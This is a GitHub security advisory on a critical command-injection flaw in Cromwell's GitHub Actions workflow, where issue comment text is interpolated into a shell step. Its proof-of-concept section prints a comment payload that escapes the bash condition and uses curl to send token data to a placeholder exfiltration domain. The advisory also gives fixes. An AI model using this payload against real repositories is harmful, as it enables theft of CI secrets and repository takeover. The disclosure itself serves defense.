logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

GHSA-phf6-hm3h-x8qp broadinstitute/cromwell

Package

Manager: github_actions
Name: broadinstitute/cromwell
Vulnerable Version: >=87 <90

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Cromwell GitHub Actions Secrets exfiltration via `Issue_comment` ### Summary Using `Issue_comment` on `.github/workflows/scalafmt-fix.yml` an attacker can inject malicious code using `github.event.comment.body`. By exploiting the vulnerability, it is possible to exfiltrate high privileged `GITHUB_TOKEN` which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret: - `BROADBOT_GITHUB_TOKEN ` ### Details The `Issue_comment` in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script. ``` - name: Check for ScalaFmt Comment id: check-comment run: | if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then echo "::set-output name=comment-triggered::true" else echo "::set-output name=comment-triggered::false" fi ``` In this case, it is possible to exfiltrate `GITHUB_TOKEN` and `BROADBOT_GITHUB_TOKEN` secrets. ### PoC To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow `.github/workflows/update_pylon_issue.yml`. ``` test" == "test" ]]; then & curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null # ``` To prove this is possible, we created an issue and we added a comment with the malicious code to extract the `GITHUB_TOKEN` and `BROADBOT_GITHUB_TOKEN` secret. With the `GITHUB_TOKEN` extracted we were able to push a new poc tag which has been deleted after a couple of minutes. <img width="1603" alt="Screenshot 2025-05-20 at 23 17 14" src="https://github.com/user-attachments/assets/e2ebdb22-3d2d-467c-9326-34ca1e4b7ecf" /> ### Impact Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo. ``` GITHUB_TOKEN Permissions Actions: write Attestations: write Checks: write Contents: write Deployments: write Discussions: write Issues: write Metadata: read Models: read Packages: write Pages: write PullRequests: write RepositoryProjects: write SecurityEvents: write Statuses: write ``` We also checked `BROADBOT_GITHUB_TOKEN` permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid `GITHUB_TOKEN`. We suggest to rotate the `BROADBOT_GITHUB_TOKEN` token asap. ### Fix - Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like: ``` - name: Dump comment run: echo "Comment Body: $BODY" env: BODY: ${{ github.event.comment.body }} ``` This safely passes the comment as an environment variable rather than interpolating it in-place. - Scope GIHTUB_TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues: ``` permissions: issues: write ``` Kindly reported by @darryk10 @AlbertoPellitteri @loresuso

Metadata

Created: 2025-05-28T14:54:20Z
Modified: 2025-05-28T14:55:02Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-phf6-hm3h-x8qp/GHSA-phf6-hm3h-x8qp.json
CWE IDs: ["CWE-78"]
Alternative ID: N/A
Finding: F404
Auto approve: 1